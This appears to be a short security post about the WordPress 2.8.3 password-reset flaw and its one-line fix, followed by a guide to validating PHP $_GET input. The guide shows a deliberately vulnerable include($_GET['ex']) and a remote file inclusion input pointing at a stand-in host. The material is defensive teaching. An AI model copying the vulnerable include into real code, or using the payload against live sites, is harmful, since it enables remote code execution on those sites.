Security


With this security vulnerability, your admin password can be reset if your WordPress version is <=2.8.3. For more information about the exploit, see: http://www.milw0rm.com/exploits/9410

Solution:

Open wp-login.php.

Find this line:

if ( empty( $key ) )

and change it to this (an array passed as the key is now rejected as well):

if ( empty( $key ) || is_array( $key ) )


or

apply the official patch: http://wordpress.org/development/2009/08/2-8-4-security-release/
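The reason the one-line change above matters is that empty() is not a type check: a query string such as key[]= makes PHP fill $_GET['key'] with a one-element array, which empty() does not treat as empty. The following added example (not code from the post or from WordPress) compares a validator written like the original check with one that carries the is_array() guard; the query strings and function names are constructed for the demonstration.

```php
<?php
// Added example: why `empty( $key )` alone is not enough and what
// `|| is_array( $key )` adds. Function names are assumptions.

// Check modelled on the pre-2.8.4 line: only rejects "empty" values.
function key_is_present_old($key) {
    return !empty($key);
}

// Check with the fix applied: rejects empty values AND arrays.
function key_is_present_new($key) {
    return !(empty($key) || is_array($key));
}

// Constructed query strings, parsed the same way PHP populates $_GET.
$cases = array(
    'key=abc123',   // ordinary string key
    'key=',         // empty string
    'key[]=',       // array with one empty element
    'key[0]=abc',   // array with one non-empty element
);

foreach ($cases as $qs) {
    parse_str($qs, $params);
    $key = isset($params['key']) ? $params['key'] : '';
    printf("%-12s old=%-6s new=%-6s type=%s\n",
        $qs,
        key_is_present_old($key) ? 'pass' : 'reject',
        key_is_present_new($key) ? 'pass' : 'reject',
        gettype($key));
}
```

Run it with the PHP CLI: the two array cases pass the old check and are rejected by the new one, while the plain string cases behave the same under both. Any code that later treats $key as a string (string functions, a prepared SQL parameter) should be guarded the same way.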


PHP $_GET Security

It is very important to validate the data you take from $_GET before using it.

You can use $_GET in many situations, and each one calls for different precautions.

For example, if you use something like this:

if (isset($_GET['ex']))
    include($_GET['ex']);   // the raw query value becomes the include path

If you use this code, malicious users can include any page they want in your web page:

?ex=http://www.example.com/bad_page.php

With this they can include any page they want. Instead, compare the value against a fixed list of allowed operations and use only the matching entry:

$operation = array('add', 'delete', 'edit', 'save');

if (in_array($_GET['ex'], $operation, true)) {   // strict comparison
    // .. do something with the allowed value ...
}

You can also use switch or if:

switch ($_GET['ex']) {
    case 'add':
        // something...
        break;
    case 'delete':
        // something...
        break;
    default:
        // something... (unknown value: reject it)
}

With if:

if ($_GET['ex'] == "add") {
    // Do something..
}
elseif ($_GET['ex'] == "delete") {
    // Do something..
}
else {
    die("possible hack attempt");
}
